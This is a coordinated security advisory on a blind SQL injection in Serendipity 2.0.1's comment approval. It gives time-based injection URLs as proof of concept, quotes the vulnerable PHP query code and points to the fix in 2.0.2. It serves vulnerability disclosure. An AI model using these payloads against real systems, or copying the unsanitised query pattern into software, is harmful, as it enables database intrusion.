Serendipity 2.0.1 Blind SQL Injection

`Serendipity 2.0.1: Blind SQL Injection  
Security Advisory – Curesec Research Team  
  
1. Introduction  
  
Affected Product: Serendipity 2.0.1   
Fixed in: 2.0.2  
Fixed Version Link:  
https://github.com/s9y/Serendipity/releases/download/2.0.2/serendipity-2.0.2.zip  
  
Vendor Contact: [email protected]   
Vulnerability Type: Blind SQL Injection   
Remote Exploitable: Yes   
Reported to vendor: 07/21/2015   
Disclosed to public: 09/01/2015   
Release mode: Coordinated release   
CVE: n/a   
Credits Tim Coen of Curesec GmbH   
  
2. Vulnerability Description  
  
There is a blind SQL injection in Serendipity 2.0.1 when approving  
comments. It can be exploited content-based, but this requires an Email  
token. Timing-based exploitation does not require a token and is thus  
easier to exploit.  
  
To prepare for the attack, an attacker has to visit the Configuration  
and set "Use Tokens for Comment Moderation" to true.  
  
Please note that admin credentials are required.  
  
3. Proof of Concept  
  
  
http://localhost/serendipity/serendipity_admin.php?serendipity[action]=admin&serendipity[adminModule]=comments&serendipity[adminAction]=pending&serendipity[id]=8'  
AND IF(SUBSTRING(version(), 1,  
1)='5',BENCHMARK(50000000,ENCODE('MSG','by 5 seconds')),null)  
%23&serendipity[token]=ValidAntiCSRFToken  
-> true  
  
http://localhost//serendipity/serendipity_admin.php?serendipity[action]=admin&serendipity[adminModule]=comments&serendipity[adminAction]=approve&serendipity[id]=8'  
AND IF(SUBSTRING(version(), 1,  
1)='4',BENCHMARK(50000000,ENCODE('MSG','by 5 seconds')),null)  
%23&serendipity[token]=ValidAntiCSRFToken  
-> false  
Note that the id must be that of an existing comment, the action must be  
acceptable - ie only pending comments can be approved and only approved  
comments can be set to pending - and the CSRF token must be valid.  
  
4. Code  
  
  
/include/admin/comments.inc.php  
serendipity_approveComment($serendipity['GET']['id'],  
$rs['entry_id']); <- user input  
  
/include/functions_comments.inc.php  
function serendipity_approveComment($cid, $entry_id, $force =  
false, $moderate = false, $token = false) {  
global $serendipity;  
  
$goodtoken = serendipity_checkCommentToken($token, $cid); <-  
not secured  
[...]  
}  
  
function serendipity_checkCommentToken($token, $cid) {  
global $serendipity;  
  
$goodtoken = false;  
if ($serendipity['useCommentTokens']) {  
// Delete any comment tokens older than 1 week.  
serendipity_db_query("DELETE FROM  
{$serendipity['dbPrefix']}options  
WHERE okey LIKE 'comment_%' AND  
name < " . (time() - 604800) );  
// Get the token for this comment id  
$tokencheck = serendipity_db_query("SELECT * FROM  
{$serendipity['dbPrefix']}options  
WHERE okey =  
'comment_" . $cid . "' LIMIT 1", true, 'assoc'); <- still not secured  
[...]  
}  
  
5. Solution  
  
To mitigate this issue please upgrade at least to version 2.0.2:  
  
https://github.com/s9y/Serendipity/releases/download/2.0.2/serendipity-2.0.2.zip  
  
Please note that a newer version might already be available.  
  
5. Report Timeline  
  
07/21/2015 Informed Vendor about Issue  
07/24/2015 Vendor releases Version 2.0.2  
09/01/2015 Disclosed to public  
  
6. Blog Reference:  
http://blog.curesec.com/article/blog/Serendipity-201-Blind-SQL-Injection-52.html  
  
  
`